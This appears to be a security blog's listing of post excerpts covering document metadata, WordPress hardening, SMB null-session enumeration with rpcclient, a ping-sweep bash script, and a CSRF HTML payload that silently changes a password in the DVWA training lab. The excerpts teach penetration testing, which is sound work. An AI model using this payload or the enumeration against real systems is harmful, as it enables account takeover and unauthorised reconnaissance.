Metadata are informations stored in a document itself but not easy to find for common mortals. Those infos usually are: file name/type/size, author, organization, created date, last modified date and so on… But sometimes there are extra infos that could be very interesting from a hacker point of view like email, phone number, username, geoloc and even local ip address.
With more than 60 million websites, WordPress is the most popular CMS currently in use but it’s also based on the most hacked environment aka LAMP.
As we all know, there is no way to stop a determined hacker but you can slow him down or detect him before things become serious. Below some techniques to improve the security of your site. This post is directly inspired from Wordpress official codex and some hackers techniques I learned last months.
According to Worpdress documentation, and I won’t discuss this point here, directories must have the following permission:
drwxr-xr-x (755) and files must be:
Wordpress says that automatic update changes file/dir permissions, that’s true but not that way in my case, maybe a cron job could do it ?
While performing a pentest, if you discover a server running the SMB protocol you can test if it’s vulnerable to anonymous connection (also called null session) and then glean a lot of informations with a RPC client. Nmap is usefull to locate that kind of service:
Now you can try to interact with the remote machine with the help of rpcclient. To perform a null session you have to specify an empty user and an empty password. If the host is not vulnerable, you will get the following error:
$ rpcclient -U "" 192.168.1.31 Enter 's password: could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED could not obtain sid for domain WORKGROUP error: NT_STATUS_ACCESS_DENIED
But if the host is vulnerable you will immediatly get a prompt:
$ rpcclient -U "" 192.168.1.18 Enter 's password: rpcclient $>
Cross-Site Request Forgery aka CSRF is an attack unintentionally triggered by the user himself.
It sends HTTP requests to execute unexpected actions in different ways: trough
img tag to perform
GET requests or with Ajax requests when
POST is required.
You can learn basic CSRF in DVWA.
To perform this CSRF you firstly need to log in, then you must visit a malicious site who will perform a stealth HTTP request who will submit the change password form with specific values.
The original request can be found by using a local proxy like Burp Suite or analyzing HTTP headers with a browser extension like Live HTTP Headers. The payload:
<html> <head> <title>My malicious website</title> </head> <body> <p>It works like a charm!</p> <img src="http://local.dvwa.com/vulnerabilities/csrf/?password_new=azerty&password_conf=azerty&Change=Change" width="1" height="1" /> </body> </html>
In the second part of the first phase of a penetration test, active information gathering, it’s important to map as accurate as possible the network of you target. To find live hosts there is a technique called ping sweep. Different tools exist to perform that task.
ping can give you the ip address of the target, the ttl and the time. However since the method is based on ICMP requests, the target could be configured to block or trash them… With a simple bash script, you can loop throught a range of ip address to test them all:
#!/bin/bash for ip in $(seq 200 220); do ping -c 1 192.168.11.$ip | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f1 & done
-c option is configured to only send 1 request. The grep is used to display only the host who respond to the request (and supposed alive) and finally cut is used for a nice display. Notice the
& at the end of the line, it’s very usefull pto paralellize tasks and make the script faster. Here is the result: